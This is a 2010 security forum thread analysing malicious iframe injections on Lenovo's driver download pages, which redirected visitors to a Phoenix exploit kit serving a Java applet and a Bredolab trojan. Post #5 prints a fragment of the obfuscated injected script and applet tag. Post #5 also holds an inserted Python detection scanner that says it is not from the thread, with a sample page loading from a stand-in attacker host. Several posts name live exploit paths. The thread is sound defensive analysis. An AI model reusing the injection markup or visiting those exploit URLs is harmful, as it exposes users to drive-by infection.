Malware (Trojan) found in download portal of Lenovo.

Discussion in 'other security issues & news' started by Ocky, Jun 20, 2010.

Thread Status:
Not open for further replies.
  1. Ocky

    Ocky Registered Member

    Joined:
    May 6, 2006
    Posts:
    2,677
    Location:
    George, S.Africa
    Don't use Lenovo Thinkpads, but came across this through a German site.
    Apparently it's a Java-based trojan downloader and seems to be using (hiding in) an IFrame left by the attacker.
    Found this from German Forum... http://www.thinkpad-forum.de/softwa...janer-alarm-in-der-lenovo-edge-treibermatrix/ (German)
    Some of the known download sites affected:

    hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-61596.html (R51e)
    hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-67100.html (X41 Tablet)
    hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-68184.html (Reserve Edition)
    hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-46024.html (R40, R40e)

    PS. It appears that Firefox and Chrome warn visitors to the website in question.
     
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Yes, it's a well-crafted attack.

    Often, the i-frame or script code injection is not the fault of the web site itself; rather, the vulnerability lies in the web hosting server, giving the hacker root access whereby the malicious code can be injected into all of the HTML pages, as shown in your example.

    Using IE to watch the pages load, we see the malicious domain being loaded by the I-frame you post:

    [screenshot: i-frame_1.gif]

    That domain has been taken down, so we can't see how the actual exploit works. Most malicious sites these days have an exploit pack, a group of exploits looking for a vulnerability in the user's system when redirected to the malicious website.


    ----
    rich
     
  3. Mornsgrans

    Mornsgrans Registered Member

    Joined:
    Jun 21, 2010
    Posts:
    1
    That domain seems to be up again, as I read a few minutes ago in another forum, but I have not tested it myself.
     
  4. Bugbatter

    Bugbatter Security Expert

    Joined:
    Jun 2, 2004
    Posts:
    14
    Location:
    USA
    According to a source at Lenovo, the malware issue impacts HTML files hosted on download.lenovo.com. Searching for general content (driver EXEs, PDFs, warranty status, IWS, system service parts, etc.) at the lenovo.com domain remains unaffected.
     
  5. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Thanks - indeed it is back up, but Lenovo has cleaned up its HTML pages on its Download site. However, we can test the link directly, and at least one of the exploits uses a Java applet, as that forum mentioned:

    [screenshot: volgo_1.gif]

    This exploit uses "evasive" techniques, so that if an attempt is made to connect another time, the Google Search Page appears:

    [screenshot: volgo_2.gif]

    Finjan wrote about this several years ago:

    Evasive Attacks Cover Their Tracks to Avoid Detection
    http://www.finjan.com/Pressrelease.aspx?id=1527&PressLan=1230&lan=3
    If you are testing using a dynamic IP address, disconnecting/reconnecting allows loading the site again.

    The code is definitely obfuscated (disguised). You can see that it downloads a .JAR (java) file, but the script itself cannot be understood without sophisticated de-obfuscation analysis:

    Code:
    <body><applet code='dev.s.Saxonia' archive='tmp/des.jar'
    
    VALUE='http://volgo - marun . cn /......?
    
    <script>var joetf6="d.<i'<ih``=A2F40Joa;=%55%58%43%71%84%35%
    0e%ee%8e%56%40%50%89%f0%ee%8c%95%c5%95%08%05%00%08
    %05%8e%56%40%50%89%f0%ee%8c%95%c5%95%08%05%00%08%
    70%60%ca%3c%b1%81%8c%08%08%08%a0%53%00%ff%ee%20%ac
    %00%00%00%00%10%ff%83%55%44%76%46%67%06%67s+
    %22%66%27%67%9rk6%76%77%66%36%f`vd.lo;t'prc,B-D09r`at2Pa.bhl'r
    Cjoatp.Epoc.';)(tpy`.eae.;e).e;e)hFnO(ibd'=de<aiel'm`lp''aab'snieScm'aiofi5t
    <<>i(celIn`dnei&Lexs=r`osej+ttnbo+id6185'sbeu}'}nPa`gpdi'`:nd'.mat
    (a'06F235EF66e4FE5EF8DD3re500004FB0312A4D67899846EA284399504FF35
    F7188A20916892994CFFBD608034741047C2374238C8CD5E001086AA803CE7
    yman'doard.h)ri+euw}eosuI)=tE'gri;tplognfrbdo'Pypetcettlowbv>Odewcc88-
    I could not get the exploit to run using Opera, even with Java enabled.


    ----
    rich
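
    Post #2 describes an i-frame injected into every HTML page of a compromised host, and post #5 shows what that frame leads to: an applet tag pulling a .jar archive and a script body made of long %xx-encoded runs. The scanner below is an added example, not code from this thread, from Lenovo or from the forum; it walks saved HTML and flags those three markers. The page it scans is a constructed sample, and the hosts attacker.invalid and download.example.com, the class and function names, and the thresholds (16 consecutive escapes, width/height of 0 or 1) are assumptions for illustration. Because of the evasive behaviour described in post #5 (one exploit response per IP address, then a redirect to Google), save each page once with a plain fetch and scan the file, rather than reloading it in a browser.

```python
"""Flag injected redirect markers in saved HTML: off-site or hidden iframes,
applet/object tags that load a .jar, and script bodies with long %xx runs.
Added example for this thread; it is not Lenovo's or the forum's code."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# 16 or more consecutive %xx escapes: the shape of the obfuscated string in post #5
PCT_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){16,}")


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings while walking the HTML token stream."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def _offsite(self, url):
        """True when the URL names a host other than the page's own host."""
        host = urlparse(url).hostname
        return bool(host) and host.lower() != self.page_host

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            src = a.get("src", "")
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (
                a.get("width", "").strip() in ("0", "1")
                or a.get("height", "").strip() in ("0", "1")
                or "display:none" in style
                or "visibility:hidden" in style
            )
            if self._offsite(src) or hidden:
                self.findings.append(("iframe", src))
        elif tag in ("applet", "object", "embed"):
            # Applets have no business on a driver download page; objects and
            # embeds are reported only when they pull a Java archive.
            archive = a.get("archive", "") or a.get("data", "") or a.get("src", "")
            if tag == "applet" or archive.lower().endswith(".jar"):
                self.findings.append((tag, archive or a.get("code", "")))
        elif tag == "script":
            self._in_script = True
            self._script_buf = []
            src = a.get("src", "")
            if self._offsite(src):
                self.findings.append(("script-src", src))

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            m = PCT_RUN.search("".join(self._script_buf))
            if m:
                self.findings.append(("script-obfuscated", m.group(0)[:48]))


def scan_html(html_text, page_host):
    """Return the list of (kind, detail) findings for one saved page."""
    scanner = InjectionScanner(page_host)
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings


# Constructed sample page modelled on the thread's description; attacker.invalid
# stands in for the exploit host and is not one of the real domains involved.
SAMPLE_PAGE = """<html><head><title>Driver matrix</title>
<script src="/js/site.js"></script></head>
<body><h1>Drivers</h1><a href="/files/driver.exe">driver.exe</a>
<iframe src="http://attacker.invalid/pek/index.php" width="0" height="0"></iframe>
<applet code='dev.s.Saxonia' archive='tmp/des.jar' width='1' height='1'>
<param name='VALUE' value='http://attacker.invalid/pek/load.php?id=1'></applet>
<script>var joetf6="%55%58%43%71%84%35%0e%ee%8e%56%40%50%89%f0%ee%8c%95%c5%95%08";
document.write(unescape(joetf6));</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE, "download.example.com"):
        print(f"{kind}: {detail}")
```

    The site's own /js/site.js is not reported because its URL carries no host, so a page that legitimately references its own scripts stays quiet; only the hidden off-site frame, the applet with its .jar and the escaped string are returned.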
     
  6. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    Very surprised Lenovo got hit, I expect the Chinese to be on the ball. Just shows :D

    Tried several times yesterday with FF and IE but saw nothing but a blank page and no nasty. Today though:

    [screenshot: vol.gif]

    Still no nasty etc. I could find.

    Wonder how many people got infected, probably not that many? But still not good.
     
  7. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    You won't find the exploit by going to the domain - the cybercriminals use the domain to point directly to the exploit file.

    If you are set up to test, you can use the direct URL shown in the i-frame in the screenshot in the first post.

    ----
    rich
     
  8. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    @Rmus

    Hi, couldn't see/find anything on there last time, even in the source. However, when I added /pek/index.php onto the www I got all this on the page:

    [screenshot: v1.gif]

    Allowed Scripting and the Java etc. box disappeared :p Don't have/want Java though. Refreshed the page and I got a redirect attempt to Google. Tried various attempts to go back, with/without Scripting/iframe, but just got time outs after about 1-2 minutes. Even using proxies with both www's resulted in the same outcome. Maybe they actively monitor their www for repeated polling etc., and then block?

    If I had managed to grab something I would have passed it on to vendors and VT etc., as I wasn't planning on running it :D
     
  9. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    That URL is no longer loading the Java Applet. Search for
    Code:
    dev.s.Saxonia
    and you will see that it is part of the exploit -- it's been around for a month or so in various guises and redirection exploits.

    See my comments in Post #5 about evasive techniques.

    ----
    rich
     
  10. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    @Rmus

    Got the source page this time ;) and sure enough, just like you said, dev.s.Saxonia is there. Also saw tmp/des.jar

    [screenshot: dev.gif]

    Input it into the very useful http://jsunpack.jeek.org/dec/go and got

    [screenshot: js.gif]

    DL'd the Zip

    [screenshot: av.gif]

    As you say

    Also noticed in there

    [screenshot: reg.gif]

    Thought you might be interested in the PDF exploits and Drivebys from there

    [screenshot: nort.gif]

    Viruses Threats found: 8

    Drive-By Downloads Threats found: 6

    http://safeweb.norton.com/report/show?name=registr3red.com


    Quite right, Sir, good thing I'm not one of your students, otherwise detention for me :D I could think of a lot worse places for it though than sunny CA :) Lucky you :p
     
  11. Ocky

    Ocky Registered Member

    Joined:
    May 6, 2006
    Posts:
    2,677
    Location:
    George, S.Africa
  12. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    This is a great tool for analysis. Thanks for posting.

    As you (and Ocky) discovered, the exploit uses an Exploit Pack, or Kit, which is very popular these days, as I mentioned in Post #2 above. The Kit comes with pre-packaged exploits targeting common vulnerabilities, both patched and non-patched. The list of exploits will change as new vulnerabilities in applications are discovered, PDF being quite useful these days!

    The cybercriminal purchases the Kit and sets up a web site (volgo-marun and registr3red in this case). The cybercriminals will have the exploit download the malware executable of their choice. Then, it's just a matter of using web tools to search around for vulnerable web servers in order to inject a malicious i-frame or script (SQL injection being very popular) that redirects the victim to the malicious web site that hosts the exploit kit.

    You may remember we discussed exploit kits in the Blade-Defender thread. For those who missed that, I posted a summary/description of some of the kits:

    https://www.wilderssecurity.com/showthread.php?p=1630504#post1630504

    As I pointed out, these types of attacks are really easy to prevent, since all of the exploits have one goal in mind: download a trojan executable. There are so many solutions these days to block this, so it's just a matter of getting the word out to all of your friends/acquaintances and help them set up suitable protection!

    ----
    rich
     
  13. Ocky

    Ocky Registered Member

    Joined:
    May 6, 2006
    Posts:
    2,677
    Location:
    George, S.Africa
    Just to say thanks, Rmus, for the very instructive postings and thanks to CloneRanger for digging deep.
     
  14. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    @Rmus

    Glad you like it, and hope it proves very useful to you from now on :) I only discovered it by accident yesterday :D as I was searching for info etc. on registr3red.com etc.

    They are still at it today with more live nasties,

    [screenshot: vol.gif]

    I DL'd 2 from slightly different www's

    [screenshot: exeup.gif]

    exe.exe = update.exe = Trojan Bredolab

    Only 2 show on VT for both = same nasty, different name.

    PEXK open and waiting :(

    [screenshot: pex.gif]

    Yes indeed, and definitely worth checking out for those that haven't :thumb: Still no sign of Blade-Defender as of yet :( Maybe it's a case of "all good things come to those that wait" ;)

    Yep, word up

    @Ocky

    You're very welcome :) but Rmus is the expert, not me :( I just tinker here and there and do whatever I can ;)

    Thanks for the Update: :thumb: Confirmed above.
     
  15. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    So, pek in the URL stands for Phoenix Exploit Kit? Very interesting!

    You are welcome, and yes, he has done some deep digging here!

    ----
    rich
     